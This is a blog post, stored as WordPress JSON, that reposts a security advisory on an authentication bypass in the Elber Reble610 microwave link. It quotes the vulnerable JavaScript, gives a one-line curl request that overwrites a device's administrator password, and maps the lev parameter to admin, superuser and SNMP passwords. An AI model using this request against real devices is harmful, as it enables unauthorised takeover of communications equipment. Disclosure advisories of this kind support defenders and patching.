{"id":56345,"date":"2024-04-18T20:20:36","date_gmt":"2024-04-18T16:20:36","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/178138\/ZSL-2024-5818.txt"},"modified":"2024-04-18T20:20:36","modified_gmt":"2024-04-18T16:20:36","slug":"elber-reble610-m-odu-xpic-ip-asi-sdh-microwave-link-authentication-bypass","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/elber-reble610-m-odu-xpic-ip-asi-sdh-microwave-link-authentication-bypass\/","title":{"rendered":"Elber Reble610 M\/ODU XPIC IP-ASI-SDH Microwave Link Authentication Bypass"},"content":{"rendered":"<p>Elber Reble610 M\/ODU XPIC IP-ASI-SDH Microwave Link Authentication Bypass<\/p>\n<p>Vendor: Elber S.r.l.<br \/>Product web page: https:\/\/www.elber.it<br \/>Affected version: 0.01 Revision 0<\/p>\n<p>Summary: The REBLE610 features an accurate hardware design, absence of<br \/>internal cabling and full modularity. The unit is composed by a basic<br \/>chassis with 4 extractable boards which makes maintenance and critical<br \/>operations, like frequency modification, easy and efficient. The modular<br \/>approach has brought to the development of the digital processing module<br \/>(containing modulator, demodulator and data interface) and the RF module<br \/>(containing Transmitter, Receiver and channel filters). From an RF point<br \/>of view, the new transmission circuitry is able to guarantee around 1 Watt<br \/>with every modulation scheme, introducing, in addition, wideband precorrection<br \/>(up to 1GHz depending on frequency band).<\/p>\n<p>Desc: The device suffers from an authentication bypass vulnerability through<br \/>a direct and unauthorized access to the password management functionality. The<br \/>issue allows attackers to bypass authentication by manipulating the set_pwd<br \/>endpoint that enables them to overwrite the password of any user within the<br \/>system. This grants unauthorized and administrative access to protected areas<br \/>of the application compromising the device&#8217;s system security.<\/p>\n<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;<br \/>\/modules\/pwd.html<br \/>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;<br \/>50: function apply_pwd(level, pwd)<br \/>51: {<br \/>52: $.get(&#8220;json_data\/set_pwd&#8221;, {lev:level, pass:pwd},<br \/>53: function(data){<br \/>54: \/\/$.alert({title:&#8217;Operation&#8217;,text:data});<br \/>55: show_message(data);<br \/>56: }).fail(function(error){<br \/>57: show_message(&#8216;Error &#8216; + error.status, &#8216;error&#8217;);<br \/>58: });<br \/>59: }<\/p>\n<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;<\/p>\n<p>Tested on: NBFM Controller<br \/>embOS\/IP<\/p>\n<p>Vulnerability discovered by Gjoko &#8216;LiquidWorm&#8217; Krstic<br \/>@zeroscience<\/p>\n<p>Advisory ID: ZSL-2024-5818<br \/>Advisory URL: https:\/\/www.zeroscience.mk\/en\/vulnerabilities\/ZSL-2024-5818.php<\/p>\n<p>18.08.2023<\/p>\n<p>&#8212;<\/p>\n<p>$ curl -s http:\/\/[TARGET]\/json_data\/set_pwd?lev=2&amp;pass=admin1234<\/p>\n<p>Ref (lev param):<\/p>\n<p>Level 7 = SNMP Write Community (snmp_write_pwd)<br \/>Level 6 = SNMP Read Community (snmp_read_pwd)<br \/>Level 5 = Custom Password? hidden. (custom_pwd)<br \/>Level 4 = Display Password (display_pwd)?<br \/>Level 2 = Administrator Password (admin_pwd)<br \/>Level 1 = Super User Password (puser_pwd)<br \/>Level 0 = User Password (user_pwd)<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Elber Reble610 M\/ODU XPIC IP-ASI-SDH Microwave Link Authentication Bypass Vendor: Elber S.r.l.Product web page: https:\/\/www.elber.itAffected version: 0.01 Revision 0 Summary: The REBLE610 features an accurate hardware design, absence ofinternal cabling and full modularity. The unit is composed by a basicchassis with 4 extractable boards which makes maintenance and criticaloperations, like frequency modification, easy and efficient. &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-56345","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/56345","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=56345"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/56345\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=56345"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=56345"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=56345"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}